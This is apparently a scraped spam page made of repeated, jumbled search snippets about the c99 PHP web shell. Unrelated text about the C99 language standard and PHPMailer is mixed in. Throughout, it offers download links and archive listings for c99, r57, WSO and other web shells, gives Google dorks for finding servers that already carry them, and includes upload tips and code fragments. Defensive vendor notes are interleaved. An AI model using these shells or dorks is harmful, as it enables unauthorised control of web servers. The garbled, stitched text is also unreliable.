Tutorial on how to use the c99 shell. The c99 shell is now detected! But here is the link: http://www.mediafire.com/download.php?39q4wolex2gvoesI'm not respo...Nov 18, 2013 · I compress c99.php, because DVWA does not allow you to upload files greater than 10000 bytes. I use gzip instead of rar, because gzip pretty much comes standard on most flavors of linux. ls -l GitHub - JohnTroony/php-webshells: Common PHP webshells you ...C99 is a very popular PHP based web-shell. There are numerous C99 variants which infect vulnerable web application to give hackers a GUI. The shell lets the attacker take control of the server and also browse the file system, upload, edit, delete, view files and even change file permissions amongst other dangerous actions. C is a general-purpose programming language, developed in 1972, and still quite popular. C is very powerful; it has been used to develop operating systems, databases, applications, etc. Start learning C now ». I found the solution just by debugging the actual php code that handles the file upload. Just do the following 2 steps like below and it will work. Step 1: Go to this directory. Step 2: Edit the index.php and override the variable like in the picture. Make sure to add it right before the 'require_once' statement. That's it, now u can upload ...\"; if (($sql_query) and (!$submit)) {echo \"Gercekden eminmisin ? :)\";} else {echo \"SQL-Query\";} echo \":root/ Shell Type (PHP-ASP-PERL) Script Include.txt? Download.rar 001 c99 Shell PHP .txt? .rar 002 r57 Shell PHP .txt? .rar 003 Tryag Shell PHP .txt? .rar 004 Apr 7, 2022 · PHP Backdoor and hacking shell archive, all php shells, r57, wso, symlink, b374k, green shell, mini shell, zerobyte shell Analysis. PHP/c99shell or simply c99shell should be well known by now - it is a PHP backdoor that provides a lot of functionality, for example: run shell commands; download/upload files from and to the server (FTP functionality); full access to all files on the hard disk; self-delete functionality. ... In short, it can pretty much do everything ...c99 web shell backdoor malware. XDR & SIEM. fix-webshell-backdoor-c99. IT-Integrated Remediation Projects. Cloud, Virtual, and Container Assessment. Easy-to-Use RESTful API. Automation-Assisted Patching. With Rapid7 live dashboards, I have a clear view of all the assets on my network, which ones can be exploited, and what I need to do in order ...Variable-length array (VLA) types and variably-modified (VM) types. Improvements of braced-init-list for array, struct and union types. Non-constant initializers. Designated initializers. Idempotent cvr-qualifiers. Trailing comma in enumerator-list. Hexadecimal floating constants.Aug 7, 2013 · I found the solution just by debugging the actual php code that handles the file upload. Just do the following 2 steps like below and it will work. Step 1: Go to this directory. Step 2: Edit the index.php and override the variable like in the picture. Make sure to add it right before the 'require_once' statement. That's it, now u can upload ... C is a general-purpose programming language, developed in 1972, and still quite popular. C is very powerful; it has been used to develop operating systems, databases, applications, etc. Start learning C now ». root/ Shell Type (PHP-ASP-PERL) Script Include.txt? Download.rar 001 c99 Shell PHP .txt? .rar 002 r57 Shell PHP .txt? .rar 003 Tryag Shell PHP .txt? .rar 004C99 (previously known as C9X) is an informal name for ISO/IEC 9899:1999, a past version of the C programming language standard. It extends the previous version ( C90 ) with new features for the language and the standard library , and helps implementations make better use of available computer hardware, such as IEEE 754-1985 floating-point ...inurl:"c99.php" filetype:php "c99shell v. 1.0 " ok c99.php Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout'; ","echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; ","if(!empty($txt)) { echo \" $txt\"; } ","echo ' ftp apache inurl:c99.php c99shell+v.+1.0 16 C99Shell v. 1.0 pre-release build #16 download intitle:c99shell "Software: Apache" allinurl: c99.phpWSO Shell, 2023 version wso php shell, All php version php7.x and php8.x executableC99 (previously known as C9X) is an informal name for ISO/IEC 9899:1999, a past version of the C programming language standard. It extends the previous version ( C90 ) with new features for the language and the standard library , and helps implementations make better use of available computer hardware, such as IEEE 754-1985 floating-point ...root/ Shell Type (PHP-ASP-PERL) Script Include.txt? Download.rar 001 c99 Shell PHP .txt? .rar 002 r57 Shell PHP .txt? .rar 003 Tryag Shell PHP .txt? .rar 004C99Shell (Web Shell) - 'c99.php' Authentication Bypass. CVE-108979 . webapps exploit for PHP platform Exploit Database Exploits. GHDB. Papers. Shellcodes.Issue originally created by user lifeforms on date 2014-06-24 13:28:39. Link to original issue: SpiderLabs/owasp-modsecurity-crs#189. It turns out that c99.php, a PHP 'web shell', is backdoored by a c99shcook parameter that bypasses auth...Aug 17, 2023 · Simple-Backdoor-One-Liner.php This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Step 4: Using PHP with Nginx. The installation of PHP on Kali Linux automatically configure Apache. If you want to use Nginx and PHP, you need to stop and disable Apache service. sudo systemctl disable --now apache2. Then install fpm extension and nginx packages. sudo apt install nginx php7.4-fpm.IndoSec private bypass shell, Password : IndoSec Usage.Password login shell, Linux Bypass Shell, Private 2022 Shell, indosec indonesian hacker group bypass bootstrap shell.History. PHPMailer was originally written in 2001 by Brent R. Matzelle as a SourceForge project. Marcus Bointon ( coolbru on SF) and Andy Prevost ( codeworxtech) took over the project in 2004. Became an Apache incubator project on Google Code in 2010, managed by Jim Jagielski. Marcus created his fork on GitHub in 2008.p0wny@shell:~# -- Single-file PHP Shell. p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this script represents a security risk for the server.May 20, 2013 · Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time. Analysis. PHP/c99shell or simply c99shell should be well known by now - it is a PHP backdoor that provides a lot of functionality, for example: run shell commands; download/upload files from and to the server (FTP functionality); full access to all files on the hard disk; self-delete functionality. ... In short, it can pretty much do everything ...WSO Shell, 2023 version wso php shell, All php version php7.x and php8.x executable0. 1.Firts, before you can using powershell on php you must open the powershell on Windows (no using php) and type this script in powershell window (without quotes) "Set-ExcetuionPolicy RemoteSigned". To verify this change type this command on window powershell (without quotes) "Get-ExecutionPolicy" if you show "RemoteSigned" text, your changes ... GitHub - JohnTroony/php-webshells: Common PHP webshells you ...I compress c99.php, because DVWA does not allow you to upload files greater than 10000 bytes. I use gzip instead of rar, because gzip pretty much comes standard on most flavors of linux. ls -lThe reason they went to that is so module maintainers wouldn't have to write different makefiles for different kernel releases. The lines causing the warnings or errors are important to post because nearly every C99 warning can be fixed without using C99, especially since modules don't use libc functions. ta0kiraC99 の後継の仕様は C11 (ISO/IEC 9899:2011)。. C99の受理の後、標準作業部会は組み込み分野、文字データ型の追加(Unicodeのサポート)、境界チェック付きのライブラリ関数などのためのテクニカルレポートを準備してきた。 Web shells come in many shapes and sizes. From the most complex of shells such as r57 and c99 to something you came up with while toying around with variables and functions. You may download c99shell.php manually <a href=\\\"\".$sourceurl.\"\\\"><u>here</u></a>.\";}"," else {fwrite ($fp,$source); fclose ($fp); return \"Thanks! C is a general-purpose programming language, developed in 1972, and still quite popular. C is very powerful; it has been used to develop operating systems, databases, applications, etc. Start learning C now ». x76x09.php is an uncensored directory browser/uploader that allows the malicious uploader to gain full control of your website. Make sure you temporarily disable all methods of uploading files to your server immediately and delete all instances of malicious code in ALL files.In addition to previous suggestions, you can mitigate the problem by adding an .htaccess file to the directory in which are hosted the images and specify to treat them with the default handler for static files: If you upload a php file to this …. Two doors where the shell hack can take over the server.C99 PHP Backdoor is a PHP script that providing a remote malicious user wit... This indicates that a system might be infected by the C99 PHP backdoor. Threat Encyclopedia | FortiGuardShell Indir! – PHP Shell Download. May 9, 2018 March 29, 2023 Webmaster 232 Comments. root/ Shell Type (PHP-ASP-PERL): Script: Include.txt? Download.rar: 001: c99 Shell : PHPC99 (previously known as C9X) is an informal name for ISO/IEC 9899:1999, a past version of the C programming language standard. It extends the previous version ( C90 ) with new features for the language and the standard library , and helps implementations make better use of available computer hardware, such as IEEE 754-1985 floating-point ...Oct 19, 2012 · inurl:"c99.php" filetype:php "c99shell v. 1.0 " ok c99.php Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout c99 background. Every C99 / C99.php Shell Is Backdoored (A.K.A. Free Shells for Everyone!) c99 bypass. Every C99 / C99.php Shell Is Backdoored (A.K.A. Free Shells for Everyone!) c99 hack. Every C99 / C99.php Shell Is Backdoored (A.K.A. Free Shells for Everyone!) c99 shell. Hacking Script Kiddies, r57.gen.tr Shells Are Backdoored in a Way You ...PHP Shell. PHP Shell is a shell wrapped in a PHP script. It's a tool you can use to execute arbitrary shell-commands or browse the filesystem on your remote webserver.. Download shell-c99 for free - Shell C99.php, Shell C99.php, shell-c99.xml, etc. 26 files of shell-c99 found at 2shared. Click here to download shell-c99 for free now ..PHPMailer offers many functionalities over the PHP core function mail(), including SMTP SSL encryption and authentication, HTML messages, file attachments and more.. On top of that, PHPMailer is much easier to use than mail() and provides a clean, readable object-oriented syntax.Probably the most notorious PHP backdoor is the C99 shell. The C99 shell has a lot of useful functionality, including quickly searching for sensitive files on the system, exploring running processes, executing commands via the server, and even a handy self uninstall feature. C99 Shell Shortfalls. C99 shell has two major problems.Simple-Backdoor-One-Liner.php This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.junio 26, 2014. Si eres de los que va dejando "niditos de amor" en servidores web vulnerables con el shell C99.php, que sepas que esas pequeñas puertecitas están abiertas también para todo aquel que quiera entrar. Matthew Bryant nos recuerda que el shell C99 tiene un backdoor debido a una vulnerabilidad en el comando extract ():Encoder Bind Proc. FTP brute Sec. SQL PHP-code Feedback Self remove Logout ... c99.php 153.91 KB 19.08.2008 10:30:04 root/adm root/ Shell Type (PHP-ASP-PERL) Script Include.txt? Download.rar 001 c99 Shell PHP .txt? .rar 002 r57 Shell PHP .txt? .rar 003 Tryag Shell PHP .txt? .rar 004 root/ Shell Type (PHP-ASP-PERL) Script Include.txt? Download.rar 001 c99 Shell PHP .txt? .rar 002 r57 Shell PHP .txt? .rar 003 Tryag Shell PHP .txt? .rar 004Aug 5, 2010 · x76x09.php is an uncensored directory browser/uploader that allows the malicious uploader to gain full control of your website. Make sure you temporarily disable all methods of uploading files to your server immediately and delete all instances of malicious code in ALL files. C99 is a PHP webshell. Attackers uploads it on web server in order to get information and above all execute commands with web user privileges (ex: www-data). This webshell is protected by a customizable password, so interface access is limited to people who know the password.c99 web shell backdoor malware. XDR & SIEM. fix-webshell-backdoor-c99. IT-Integrated Remediation Projects. Cloud, Virtual, and Container Assessment. Easy-to-Use RESTful API. Automation-Assisted Patching. With Rapid7 live dashboards, I have a clear view of all the assets on my network, which ones can be exploited, and what I need to do in order ...May 26, 2014 · inurl:c99.php c99 shell powered by Captain Crunch Security Team !C99Shell v. 1.0 pre-release build #5! intitle:”c99shell” filetypehp root Jul 10, 2014 · # Exploit Title: C99 Shell Authentication Bypass via Backdoor # Google Dork: inurl:c99.php # Date: June 23, 2014 # Exploit Author: mandatory ( Matthew Bryant ) Jan 12, 2015 · What is PHP.C99? C99 is a very popular PHP based web-shell. There are numerous C99 variants which infect vulnerable web application to give hackers a GUI. The shell lets the attacker take control of the server and also browse the file system, upload, edit, delete, view files and even change file permissions amongst other dangerous actions. C99 is a very popular PHP web-shell. There are numerous C99 variants which infect vulnerable web application to give hackers a GUI. The shell lets the attacker take control of the server and also browse the file system, upload, edit, delete, view files and even change file permissions amongst other dangerous actions.Mar 4, 2015 · Analysis. PHP/c99shell or simply c99shell should be well known by now - it is a PHP backdoor that provides a lot of functionality, for example: run shell commands; download/upload files from and to the server (FTP functionality); full access to all files on the hard disk; self-delete functionality. ... In short, it can pretty much do everything ... C99.php Shell - Authentication Bypass Vulnerability 2014-07-10T00:00:00 Description. Exploit for php platform in category web applications Products. Security ... In addition to previous suggestions, you can mitigate the problem by adding an .htaccess file to the directory in which are hosted the images and specify to treat them with the default handler for static files: If you upload a php file to this …. Two doors where the shell hack can take over the server.Issue originally created by user lifeforms on date 2014-06-24 13:28:39. Link to original issue: SpiderLabs/owasp-modsecurity-crs#189. It turns out that c99.php, a PHP 'web shell', is backdoored by a c99shcook parameter that bypasses auth...p0wny@shell:~# -- Single-file PHP Shell. p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this script represents a security risk for the server. Variable-length array (VLA) types and variably-modified (VM) types. Improvements of braced-init-list for array, struct and union types. Non-constant initializers. Designated initializers. Idempotent cvr-qualifiers. Trailing comma in enumerator-list. Hexadecimal floating constants.0. 1.Firts, before you can using powershell on php you must open the powershell on Windows (no using php) and type this script in powershell window (without quotes) "Set-ExcetuionPolicy RemoteSigned". To verify this change type this command on window powershell (without quotes) "Get-ExecutionPolicy" if you show "RemoteSigned" text, your changes ... Simple-Backdoor-One-Liner.php This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.In some cases, attackers that create new web shells that may use non-standard naming conventions such as c99.php or a.php. In other cases, they will put web shells in non-standard web directories (like we did for our eval web shell example, images directory). Default file mods. In many cases, attackers don’t create a new file for their web shell.R57, Shell, c99, Safe, Shell.rar, c99.php, sadrazam shell, r00t shell, sadrazam.rar, R57.php, Safe0ver Bypass Shell.rar, exploit, r57shell.netNov 21, 2011 · Probably the most notorious PHP backdoor is the C99 shell. The C99 shell has a lot of useful functionality, including quickly searching for sensitive files on the system, exploring running processes, executing commands via the server, and even a handy self uninstall feature. C99 Shell Shortfalls. C99 shell has two major problems. Shell Indir! – PHP Shell Download. May 9, 2018 March 29, 2023 Webmaster 232 Comments. root/ Shell Type (PHP-ASP-PERL): Script: Include.txt? Download.rar: 001: c99 Shell : PHPR57, Shell, c99, Safe, Shell.rar, c99.php, sadrazam shell, r00t shell, sadrazam.rar, R57.php, Safe0ver Bypass Shell.rar, exploit, r57shell.netsafe mode bypass root exploits shell archive.r57 c99 alfa wso php 5 6 7 8 shell mini asp aspx symlink b374k adminer upload marijuana txt rar download.Index of /userfiles/file Name Last modified Size Description : Parent Directory - 1a/ 2020-08-09 12:15 - 2.jpgHow to upload C99 PHP Shell Backdoor & Hack website One of the most common method to hack website. So friends first of all This is for Educational purpose only. [Ethical Hacking]. Please learn & do... File Name ↓ File Size ↓ Date ↓ ; Parent directory/--index.php: 117 B: 2015-Jan-21 11:13: php-3.0.17-win32.zip: 1.8 MiB: 2015-Jan-21 11:13: php-3.0.18.tar.gz: 2.1 MiB: 2015-Jan-21 11:13History. PHPMailer was originally written in 2001 by Brent R. Matzelle as a SourceForge project. Marcus Bointon ( coolbru on SF) and Andy Prevost ( codeworxtech) took over the project in 2004. Became an Apache incubator project on Google Code in 2010, managed by Jim Jagielski. Marcus created his fork on GitHub in 2008.Finding a c99 shell is an excellent way to identify a compromise on a system. The c99 shell is about 1500 lines long, and some of its traits include showing security measures the web server may use, a file viewer that has permissions, a place where the attacker can operate custom PHP code (PHP malware c99 shell).Encoder Bind Proc. FTP brute Sec. SQL PHP-code Feedback Self remove Logout ... c99.php 153.91 KB 19.08.2008 10:30:04 root/adm c99.php This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor ... c99.php This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor ...Finding a c99 shell is an excellent way to identify a compromise on a system. The c99 shell is about 1500 lines long, and some of its traits include showing security measures the web server may use, a file viewer that has permissions, a place where the attacker can operate custom PHP code (PHP malware c99 shell).GitHub Gist: instantly share code, notes, and snippets.Mar 4, 2015 · Analysis. PHP/c99shell or simply c99shell should be well known by now - it is a PHP backdoor that provides a lot of functionality, for example: run shell commands; download/upload files from and to the server (FTP functionality); full access to all files on the hard disk; self-delete functionality. ... In short, it can pretty much do everything ... PHP Shell. PHP Shell is a shell wrapped in a PHP script. It's a tool you can use to execute arbitrary shell-commands or browse the filesystem on your remote webserver.. Download shell-c99 for free - Shell C99.php, Shell C99.php, shell-c99.xml, etc. 26 files of shell-c99 found at 2shared. Click here to download shell-c99 for free now ..C99 (previously known as C9X) is an informal name for ISO/IEC 9899:1999, a past version of the C programming language standard. It extends the previous version ( C90 ) with new features for the language and the standard library , and helps implementations make better use of available computer hardware, such as IEEE 754-1985 floating-point ...Encoder Bind Proc. FTP brute Sec. SQL PHP-code Feedback Self remove Logout ... c99.php 153.91 KB 19.08.2008 10:30:04 root/adm PHP Shell. PHP Shell is a shell wrapped in a PHP script. It's a tool you can use to execute arbitrary shell-commands or browse the filesystem on your remote webserver.. Download shell-c99 for free - Shell C99.php, Shell C99.php, shell-c99.xml, etc. 26 files of shell-c99 found at 2shared. Click here to download shell-c99 for free now ..
The c99 shell is about 1500 lines long if packed and 4900+ if properly displayed, and some of its traits include showing security measures the web server may use, a file viewer that has permissions, a place where the attacker can operate custom PHP code (PHP malware c99 shell).. 666
Aug 7, 2007 · Anyone here have any experience with this so called shell script named c99.php. There are many phishing scripts out there, C99shell.php is one of'em which provides a shell-like prompt to let you execute PHP code interactively. The Php Shell is a Php based script. With this script a hacker can execute arbitrary shell commands or browse the file ... 0)"," {"," foreach ($dbsqlquicklaunch as $item)"," {"," echo \"[ \" . $item[0] . \"] \";"," }"," }"," echo \"Mar 9, 2008 · The reason they went to that is so module maintainers wouldn't have to write different makefiles for different kernel releases. The lines causing the warnings or errors are important to post because nearly every C99 warning can be fixed without using C99, especially since modules don't use libc functions. ta0kira R57, Shell, c99, Safe, Shell.rar, c99.php, sadrazam shell, r00t shell, sadrazam.rar, R57.php, Safe0ver Bypass Shell.rar, exploit, r57shell.netC99 is a very popular PHP web-shell. There are numerous C99 variants which infect vulnerable web application to give hackers a GUI. The shell lets the attacker take control of the server and also browse the file system, upload, edit, delete, view files and even change file permissions amongst other dangerous actions. How to upload C99 PHP Shell Backdoor & Hack website One of the most common method to hack website. So friends first of all This is for Educational purpose only. [Ethical Hacking]. Please learn & do...قذيفة c99 حوالي 1500 خطوط طويلة ، وبعض السمات الخاصة به تشمل إظهار تدابير الأمن قد تستخدم خادم الويب ، عارض ملف لديه أذونات ، وهو المكان الذي يمكن ان تعمل المهاجم رمز php مخصص (php البرمجيات الخبيثة ...Mar 4, 2015 · Analysis. PHP/c99shell or simply c99shell should be well known by now - it is a PHP backdoor that provides a lot of functionality, for example: run shell commands; download/upload files from and to the server (FTP functionality); full access to all files on the hard disk; self-delete functionality. ... In short, it can pretty much do everything ... p0wny@shell:~# -- Single-file PHP Shell. p0wny@shell:~# is a very basic, single-file, PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this script represents a security risk for the server.Mar 9, 2008 · The reason they went to that is so module maintainers wouldn't have to write different makefiles for different kernel releases. The lines causing the warnings or errors are important to post because nearly every C99 warning can be fixed without using C99, especially since modules don't use libc functions. ta0kira root/ Shell Type (PHP-ASP-PERL) Script Include.txt? Download.rar 001 c99 Shell PHP .txt? .rar 002 r57 Shell PHP .txt? .rar 003 Tryag Shell PHP .txt? .rar 004 I found the solution just by debugging the actual php code that handles the file upload. Just do the following 2 steps like below and it will work. Step 1: Go to this directory. Step 2: Edit the index.php and override the variable like in the picture. Make sure to add it right before the 'require_once' statement. That's it, now u can upload ...Jan 20, 2018 · PHP Shell. PHP Shell is a shell wrapped in a PHP script. It's a tool you can use to execute arbitrary shell-commands or browse the filesystem on your remote webserver.. Download shell-c99 for free - Shell C99.php, Shell C99.php, shell-c99.xml, etc. 26 files of shell-c99 found at 2shared. Click here to download shell-c99 for free now .. Size: 15.09 KB 30-06-2022 12:38:50. Wso Shell. Size: 47.12 KB 30-06-2022 12:55:04. c99 Shell. Size: 113.13 KB 30-06-2022 12:45:17. IndoXploit v4.1 PHP Shell. Size: 58.43 KB 30-06-2022 12:38:06. r57 Shell Classic. Size: 57.67 KB 30-06-2022 12:52:53.R57, Shell, c99, Safe, Shell.rar, c99.php, sadrazam shell, r00t shell, sadrazam.rar, R57.php, Safe0ver Bypass Shell.rar, exploit, r57shell.net '; ","echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n]; ","if(!empty($txt)) { echo \" $txt\"; } ","echo ' C99 is a PHP webshell. Attackers uploads it on web server in order to get information and above all execute commands with web user privileges (ex: www-data). This webshell is protected by a customizable password, so interface access is limited to people who know the password.\"; if (($sql_query) and (!$submit)) {echo \"Gercekden eminmisin ? :)\";} else {echo \"SQL-Query\";} echo \":c99 web shell backdoor malware. XDR & SIEM. fix-webshell-backdoor-c99. IT-Integrated Remediation Projects. Cloud, Virtual, and Container Assessment. Easy-to-Use RESTful API. Automation-Assisted Patching. With Rapid7 live dashboards, I have a clear view of all the assets on my network, which ones can be exploited, and what I need to do in order ...Jun 24, 2014 · Issue originally created by user lifeforms on date 2014-06-24 13:28:39. Link to original issue: SpiderLabs/owasp-modsecurity-crs#189. It turns out that c99.php, a PHP 'web shell', is backdoored by a c99shcook parameter that bypasses auth... .